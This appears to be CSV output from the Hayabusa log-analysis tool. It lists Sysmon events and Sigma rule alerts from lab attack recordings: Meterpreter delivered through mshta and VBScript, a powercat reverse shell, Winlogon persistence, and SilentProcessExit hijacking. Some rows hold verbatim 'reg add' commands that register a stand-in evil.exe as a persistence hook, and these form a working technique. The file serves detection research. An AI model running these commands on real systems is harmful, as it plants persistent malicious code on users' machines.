2019-06-15 07:23:07.082 +09:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.894 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,../hayabusa-rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.972 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:15.054 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:16.592 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:23.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.811 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.811 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.999 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:53.358 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:44.106 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:14:32.809 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:50.488 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:51.035 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.973 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:08.473 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-20 02:22:37.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:45.694 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:55.397 +09:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:58.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:58.944 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.928 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:01.990 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:23:02.350 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} 
S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:10.334 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:11.694 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 02:23:11.694 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx 2019-06-20 17:07:42.331 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:42.331 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:42.331 +09:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.909 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.909 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 
365ABB72-3ED4-5D0B-0000-00106C871A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.925 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:48.925 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:50.378 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx 2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
